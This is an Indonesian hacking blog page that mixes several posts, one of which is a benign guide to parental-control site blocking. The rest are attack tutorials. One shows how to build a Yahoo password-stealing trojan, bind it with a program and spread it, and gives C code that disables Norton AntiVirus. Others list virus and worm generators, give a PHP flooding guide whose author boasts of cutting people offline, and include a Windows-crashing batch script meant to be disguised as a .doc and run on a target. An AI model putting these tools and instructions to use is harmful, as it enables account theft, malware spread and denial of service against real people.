Saturday, October 26, 2013

VBS Worm Generator

Filename	Size	Description	Date
vbswc001.zip	16254	[VBSWC 0.01]	Jun 2000	MD5 sum 6f6deca671727244aadaee780b1c5cec
vbswc080.zip	35979	[VBSWC 0.8]	Jul 2000	MD5 sum b691275358639ee9d90eb5e6c2bc4f30
vbswg090.zip	41449	[VBSWG 0.9]	Jul 2000	MD5 sum 7b3e70acabe8f9cb130e3756a851ecf4
vbswg091.zip	44690	[VBSWG 0.91]	Jul 2000	MD5 sum 719006e66336da90d44c8cdf889b4e31
vbswg095.zip	53183	[VBSWG 0.95]	Jul 2000	MD5 sum c4c0fae031decde39460be28d68215b1
vbswg100.zip	57542	[VBSWG 1.00]	Jul 2000	MD5 sum 54b72b537692f50688e4940ed06df416
vbswg110.zip	71231	[VBSWG 1.1]	Jul 2000	MD5 sum 8136df797646ce54c82359a890cbcc38
vbswg150.zip	147748	[VBSWG 1.50]	Jul 2000	MD5 sum 7d48b17cc9bad2c89255404679fa95fb
vbswg150b.zip	103235	[VBSWG 1.50b]	Aug 2000	MD5 sum 22b4261ec2595b87d1bd4c6a385d6325
vbswg200b.zip	119836	[VBSWG 2.00b]	Mar 2001	MD5 sum 27cc48306f884790fa9e4b7d96940327
vbswg200bf.zip	120118	[VBSWG 2.00b (fix)]	Mar 2001	MD5 sum c231a81ac65ceeb5b1e1ca542f78d94d

DeepFreeze 7.0.01.2/soniddos.exe

Name: DeepFreeze 7.0.01.2

License : Freeware , Free Download

Type: Sample Virus (executable file) [jangan digunakan!!]

Size: 9KB http://www.ziddu.com/download/16959768/soniddos.exe.html

Mari kita bermain2 dengan trojan... tapi sebaiknya sebelum Anda membaca tulisan ini ada baiknya membaca tulisan gue sebelumnya tentang "Trojanku Sayang.. Trojanku Hilang" karena pada tulisan tersebut Anda akan mendapatkan pengetahuan tentang peralatan pendukung yang bisa digunakan dalam penyerangan mempergunakan trojan.

Anda pernah kehilangan Yahoo Account...?? sehingga email Anda tidak bisa dibuka lagi...??? Itu semua karena Anda ceroboh... Anda kena aksi dari sebuah trojan atau bisa jadi kena Social Engineering... ;) atau apalah.. karena memang banyak cara untuk mengambil alih account yahoo orang lain...

Kali gue mau main2 dengan trojan, nanti trojannya dikasih tugas untuk mendapatkan Yahoo account berupa username + passwordnya.

Trojan ini memang diciptakan dan selalu dikembangkan sesuai dengan perkembangan versi Yahoo Messenger.

Trojannya kita buat dengan trojan generator kemudian kita binding (ikat) dengan aplikasi pem-binding. Nanti hasil dari pembindingannya kita sebar di beberapa tempat, bisa melalui email, kirim langsung melalui YM atau dengan cara membuang (?) CD ditempat tertentu.

Bagaimana caranya?

Persiapan :
[-] Magic-PS Trojan Generator. Bisa Anda download disini : http://lirva32.org/download/Magic-PS-15se++.zip
[-] File Binder. Anda bisa memanfaatkan file binder apapun.
[-] C Compiler

Target Trojan :
[-] User yang mempergunakan windows (-- yg pake linux aman bro ;)
[-] User yang masih bisa kena 'social engineering' (bro.. terserah gimana caranya deh.. biar tuh user bisa mati'in Antivirusnya....)
Kalo dia ga mau mati'in ya udah nanti kita matikan secara paksa dengan coding tertentu... ingat jangan maen clurit ya? ;) ).

Pembuatan Trojan : [-] Matikan semua Antivirus yang berada di komputer Anda (--hhikkzzz.. kalo ga dimatikan bakalan ga' bisa bikin trojan).
[-] Buatlah sebuah folder untuk menempatkan hasil trojan.
[-] Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah trojan generator tersebut.

Nanti tampilannya seperti ini :

Keterangan Trojan :

[01] Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada trojan yang Anda inginkan, misalkan saja mengambil IP Address si target.

[02] File After Install, jika trojan ini dieksekusi maka trojan tersebut akan melakukan penyamaran diri berupa file 'regsvr.exe'. Anda bisa memilih file penyamaran lainnya.

[03] Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut tidak disertai "@yahoo.com". Jadi cukup mengisi ID saja. Trojan akan mencuri account + password si target kemudian secara otomatis trojan akan mengirim account tersebut ke email Anda (alamat email yang Anda set di trojan loh...)

[04] Choose icon, silahkan Anda memilih icon penyamaran trojan.

[05] FileName, ini merupakan file trojan hasil generator. File inilah yang nantinya Anda kirim ke target yang menjadi sasaran kita ;)
jangan sekali2 mengeksekusi file ini di komputer milik pribadi.... ;)
[06] Create MPS merupakan tombol yang men-generate trojan.

Penyiapan Routin Pembunuh NAV :

Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk membunuh NAV secara paksa. Routine ini dibuat oleh teman saya : Magic_h2001
(Hai 'Magic_h2001'... thx for ur code).

//--- code ----//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/

#include <windows.h>
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
    return 1;
    size=sizeof(buff);
    temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
    return 1;
    RegCloseKey(handle);
    strcat(buff,"\\Symantec Shared\\virusdefs\\");
    strcpy(fName,buff);
    strcat(buff,"definfo.dat");
    SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
    handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
    OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
    return 1;
    size=GetFileSize(handle,&temp)-32;
    Lpbuff=GlobalAlloc(GMEM_FIXED,size);

if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}

* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.
//--- code ----//

Proses Penyerangan :

Anggap saja dari beberapa proses tersebut diatas kita sudah mememiliki 2 (dua) file yaitu :
- sender.exe ----> trojan
- killanvir.exe ----> pembunuh NAV.

Kini saatnya Anda melakukan proses Binder terhadap keduanya. Yang terpenting pada proses Binder file yang bekerja pertama adalah killanvir.exe.
Hal ini dilakukan agar sebelum trojannya jalan, NAV sudah terbunuh lebih dulu. Setelah proses binding selesai kini saatnya Anda menyebarkan file tersebut ke target yang dituju. Terserah, dengan metode apapun (sekali lagi, jangan pakai clurit! ;) ).

Selamat menikmati trojan, dan ingat segala yang anda lakukan adalah tanggung jawab anda, anda dapat menghubungi penulis untuk berdiskusi.

.thx
lirva32

Shoutz

- echo|staff : y3dips,m0by,the_day,comex,z3r0byt3,k-159,c-a-s-e,s'to,lirva32,anonymous
- Anakku : Faiza Debian Navisa... yang mengisi hari2ku dengan keceriaannya...
- My Friends : Mas Arif "s4k1tjiw4',az001, sevior,ocep_wie,sugeng_p,r34d3r,cbug,
cyb3rtank, cr4sh3r,istofani,#SolpotCrew, #BekasiHacker,#kecoak, #kalengbekas,
#samarinda_hack, #aikmel, #renjana and AllNewbieHacker.
- MyAlamamater : FTI-BudiLuhurUniversity

Teknik Memblok Situs Tidak Baik

Bagi para pengguna Internet, pada hari ini sebetulnya teknik memblok situs tidak baik sudah sedemikian mudahnya. Sebagian besar bahkan dapat dilakukan menggunakan software gratisan tidak perlu membayar se-peser-pun.

Pengguna Internet mempunyai beberapa pilihan, yaitu:
* Menggunakan sistem operasi yang secara aktif memblok situs tidak baik.
* Mencari software Parental Control
* Menggunakan Browser Firefox dan menambahkan plugin Parental Control.
* Menggunakan DNS dari OpenDNS.

Diantara beberapa teknik di atas, teknik menggunakan browser Firefox dengan mengaktifkan plugin Parental Control barangkali merupakan cara yang paling sederhana yang dapat digunakan oleh para pengguna Internet.Tentunya masih banyak teknik blok situs tidak baik yang ada di Internet. Penjelasan lebih lengkap terutama untuk sistem administrator jaringan dapat di baca pada :
http://opensource.telkomspeedy.com/wiki/index.php/Teknik_Memblok_Situs_Tidak_Baik
Sistem Operasi Yang Memblok Situs Porno
Tidak banyak sistem operasi yang mengintegrasikan pemblokiran situs tidak baik. Salah satu yang terbaik hari ini adalah Ubuntu Muslim Edition (UbuntuME) yang secara terintegrasi mengimplementasi teknik untuk memblokir situs tidak baik di dalam-nya.Anda yang menggunakan Ubuntu Muslim Edition tidak perlu pusing-pusing mempelajari berbagai teknik blok situs, karena semua sudah built-in dan siap pakai tanpa perlu bersusah payah meng-konfigurasi.

Ubuntu Muslim Edition dapat di ambil pada :
* http://kambing.ui.edu/pub/ubuntume/
atau memesan / membeli DVD / CDROM-nya dengan harga murah dari
* http://juragan.kambing.ui.edu/
* http://toko.baliwae.com/
* http://www.gudanglinux.com/

UbuntuME versi DVD lebih lengkap telah terintegrasi OpenOffice. Versi minimal adalah UbuntuME versi CDROM, tidak ada OpenOffice.Bagi anda yang kurang beruntung karena tidak menggunakan Ubuntu Muslim Edition, anda perlu mempelajari teknik-teknik berikut untuk melakukan pemblokiran.Memblok Menggunakan OpenDNS
Memblok menggunakan OpenDNS sebetulnya tidak terlalu sukar, anda hanya perlu memasukan IP address OpenDNS, yaitu :
* 208.67.222.222
* 208.67.220.220

Bagi anda yang menggunakan Windows, kemungkinan besar settingan ini dilakukan dari menu Control Panel -> Networking -> Properties -> TCP/IP -> DNS.Penggunaan Software Parental Control
Bagi para pengguna / end user yang masih menggunakan Windows. Ada baiknya mencari di Google dengan keyword "Parental Control", memang kebanyakan software di Windows berbayar, bukan gratisan. Walau ada yang open source. Review software Parental Control dapat dilihat di
http://www.consumersearch.com/www/software/parental-control-software/.Beberapa Software Parental Control ter-Favorit :
* Net Nanny 5.6 (~$50 / tahun)
* CyberPatrol 7.6 (~$40 / tahun)
* Safe Eyes 5.0 (~$50 / tahun)

Beberapa Software Parental Control Windows yang gratisan / open source :
* ParentalControlBar dari http://www.parentalcontrolbar.org/
* Crawler Parental Control dari http://www.crawlerparental.com/
* http://www1.k9webprotection.com/Memblok Situs Porno Menggunakan Content Filter di Firefox
Cara sederhana untuk blok situs porno menggunakan Browser Firefox.
1. Buang Internet Explorer.
2. Instal Firefox.
3. tambahkan plugins (addons) utk content filtering

Firefox dapat diambil dari situs http://www.mozilla.com. Plugin / Addons di Firefox biasanya size-nya kecil beberapa puluh Kbyte atau ratusan Kbyte, biasanya di-install langsung dari Internet. Ada beberapa plugins / addons "Parental Control" di Firefox, seperti :
* https://addons.mozilla.org/en-US/firefox/addon/5881 Glubble Family Edition
* https://addons.mozilla.org/en-US/firefox/addon/1865 Adblock Plus
* https://addons.mozilla.org/en-US/firefox/addon/3145 BlockSite
* https://addons.mozilla.org/en-US/firefox/addon/1803 ProCon Latte
* https://addons.mozilla.org/en-US/firefox/addon/4351 FoxFilter.

Kumpulan Tolls Pembuat Virus, Worm, Trojan

Download di sini (……….)

VCL32

Download di sini (………..)

VDX Batch Generator

Download di sini (………..)

Viral Matrix

Download di sini (………)

Virus Laboratory for DOS

Download di sini (……….)

The Virus Wizard

Download di sini (………)

Visual Basic Worm Generator

Download di sini (………)

The WalruS Macro Virus Engine

Download di sini (………)

Wavefunc’s Goofy Batch Virus Generator v1.1c

Download di sini (………)

WG Batch n’ Script

Download di sini (………)

Flooding Dengan PHP DOS

Ada banyak cara untuk melakukan flooding dan juga ada banyak ragam tools yang bisa digunakan (salah satu yang terkenal adalah tembak.c yang hanya bisa berjalan di linux). Salah satu tools flooding yang mudah untuk di gunakan adalah PHP DOS, tools ini akan melakukan flood via TCP dan UDP menuju ke target IP dengan Port tententu. Fungsinya? ya flooding sampai dengan target merasa terganggu.

Tools ini biasa saya gunakan kalau lagi jengkel dengan orang yang banyak omong kosong, biasanya di chatroom ada yang ngomong sembarangan iseng saya flood sampai internetnya mati total, pernah juga saya gunakan mengganggu jaringan disekitar sini sampai berhari-hari hehehe….

~~jangan bilang-bilang ya~~

Ada banyak pertanyaan dan pernyataan orang tentang PHP DOS. Yang paling umum adalah kenapa gagal? Gagal karena data yang kita kirimkan lebih kecil dari pipa yang digunakan target sehingga efeknya tidak akan terasa.

Lalu bagaimana agar bisa berhasil? gampang, di balik saja!

Dari gambar di atas sudah jelas aturannya jika kita ingin berhasil melakukan flooding resource kita harus lebih besar dari target. Resource ini meliputi kecepatan processor, jumlah random access memory, dan yang terpenting ialah kemampuan transfer data.

Persyaratan umum yang diperlukan:

Dedicated Server/Virtual Private Server (Windows/linux).
XAMPP/LAMPP.
Kemampuan transfer data yang sangat besar (misalnya 100GigaBytesPerSeconds)

Mengikuti aturan diatas bahwa resource kita harus lebih besar dari target untuk itu saya arahkan ke dedicated server/virtual private server karena umumnya kedua produk ini resourcenya di atas rata-rata umum dan penggunaannya bebas tergantung kemauan pemiliknya. Setelah membeli salah satu produk ini selanjutkan kita install saja langsung xamp/lampp.

Kemudian langkah selanjutnya download file ini, extract, lalu letakkan didalam folder public_html/htdocs apalah namanya yang jelas folder yang bisa diakses publik.

Setelah itu akan kita dapatkan tampilan seperti ini..

Cara menggunakanny mudah saja, ketikkan IP target kedalam kolom IP. Pada kolom time kita masukkan interval berapa lama kita ingin melakukan flooding (dalam hitungan detik) misalnya kita ingin flood selama 1 jam maka valuenya adalah 60×60=3600. Pada kolom port kita bisa tentukan sendiri port berapa yang akan kita gunakan, umumnya adalah port 80. Setelah semua value kita masukkan tinggal klik pada tombol “start the attack” lalu browsernya jangan kita tutup.

dalam 1-5 menit kedepan jika resource kita lebih besar daripada target maka dapat dipastikan target akan mengalami efek leher botol, yaitu data yang dikirimkan menuju target akan lebih besar dari kemampuan menerima target sehingga akibatnya target tidak bisa mengirimkan data keluar maupun masuk. yang akan dirasakan oleh target adalah koneksi internetnya terputus..

WARNING:

Jangan digunakan pada shared hosting apalagi free hosting.
Jangan terlalu iseng/sembarangan semua orang di flood, gunakan sebijak mungkin.
Semua risiko yang dilakukan mengikuti artikel ini adalah tanggung jawab pribadi masing-masing

CRASHING WINDOWS

Pagi ini gue duduk sendirian diruangan kerja... (--ditemenin setan kali yah...) Asistenku belum juga ada yang datang...(biasanya sih ban motornya gembos... atau macet... atau apalah.....) ditemani flu, migran dan batuk aku coba menulis sesuatu yang sangat berbahaya... sekali lagi... tidak mempergunakan apa yang sampaikan untuk kegiatan destruktif... cukup menjadi bahan tambahan informasi dan proses pembelajaran elo semuanya...
Baru aja gue nyoba melakukan flooding ke system windows di komputer yang biasa dipake 'Made'. Tau 'Made' ga...?? Made itu asisten gue yang tinggi, cukring, lucu n jjjeeelllxxxxxxx... awalnya sih gue iseng... karena gue pikir karena RAM yang dipakenya gede banget sampe 2 Gb.... hhhmmm... enak juga nih komputer buat sasaran....
Minum teh manies dulu aaahhhh..... srrruuuppuuutttttt..... nah, gue langsung inget dengan perintah 'ping'... percaya 'ga kalo perintah ping itu bisa buat iseng2 bin jahil..... gimana caranya :

1. Persiapkan sebuah file : *.bat, dengan isi sbb :

echo Windows NT/XP/2K/2K3 Localhost Flooding
echo Script ini menghasilkan tindakan destruktif, jadi jangan menjalankan script ini
echo di lingkungan Sekolah, Kampus, Institusi dan Organisasi penting.
echo lirva32 tidak bertanggung jawab atas semua tindakan.......
echo ----------------------------------------------------------------------------------------
echo.
echo Mengaktifkan Web Broser.... tunggu...
start /high http://www.echo.or.id/
echo Jika situs http://www.echo.or.id sudah aktif.. silahkan tekan sembarang tombol....
pause
cls
start /high /min taskmgr.exe
for %%d in ( A B C D E F G H I J K L M N O P Q R ) do start /min ping -l 65527 -n 100000 localhost
cls
echo ----------------------------------------------------------------------------------------
echo Sorry... Ur Windows crashed.......

2. Simpan file tersebut.. terserah namanya apa saja....
3. Google : bat2com, sebuah compiler merubah *.bat menjadi *.com
4. Lakukan pengcompile-an *.bat ke *.com (ga usah di compile sih gpp....)
5. Jalankan file tersebut di komputer target..... mau aman ya coba dibinding pake aplikasi pembinding... lakukan pembindingan dengan file *.doc jadi terkesan file yang kamu buat menyerupai *.doc.

//
var message = new Array() // leave this as is

message[0] = "Welcome to my Blogger !";
message[1] = "Selamat Datang di Blog saya !";
message[2] = "Terima Kasih Sudah Mengunjungi Blog Ini";
message[3] = "Semoga Berguna!!!";
message[4] = "Jangan Lupa Folow Blog Ini!!!";
message[5] = "Maaf Kalo Ada Salah Kata !!!";

var reps = 2

var speed = 200

var p=message.length;
var T="";
var C=0;
var mC=0;
var s=0;
var sT=null;
if(reps<1)reps=1;
function doTheThing(){
T=message[mC];
A();}
function A(){
s++
if(s>9){s=1}

if(s==1){document.title='[S====] '+T+' [====S]'}
if(s==2){document.title='[=O===] '+T+' [===O=]'}
if(s==3){document.title='[==N==] '+T+' [==N==]'}
if(s==4){document.title='[===Y=] '+T+' [=Y===]'}
if(s==5){document.title='[====A] '+T+' [A====]'}
if(s==6){document.title='[===L=] '+T+' [=L===]'}
if(s==7){document.title='[==S==] '+T+' [==S==]'}
if(s==8){document.title='[=O===] '+T+' [===O=]'}
if(s==9){document.title='[N====] '+T+' [====N]'}
if(C<(8*reps)){
sT=setTimeout("A()",speed);
C++
}else{
C=0;
s=0;
mC++
if(mC>p-1)mC=0;
sT=null;
doTheThing();}}
doTheThing();
//]]>

Pages

Saturday, October 26, 2013

VCL32

VDX Batch Generator

Viral Matrix

Virus Construction Set

Virus Creation 2000

Virus Creation Lab

Virus Development Kit

Virus Factory mit Code – Tabelle

A virus generator

Virus Laboratory for DOS

The Virus Wizard

Visual Basic Worm Generator

The WalruS Macro Virus Engine

Wavefunc’s Goofy Batch Virus Generator v1.1c

WG Batch n’ Script

Windows Scripting Host Worm Constructor

Windows Virus Creation Kit

WMF Maker

Wonesek VBS Joiner

Word97 Macro Virii Construction Kit

Worm IRC Script Kit

XVGL

$MOOTHiE::s Macro Virus Creator 2000

Access Macro Generator

Acid Flowing Trojan Generator

Advanced Steam Trojan Generator

Alchemic Life Generator

Apokalipses

BAT Poly Generator

Batch Encrypt

Bio Hazard Worm Generator

C++ Worm Generator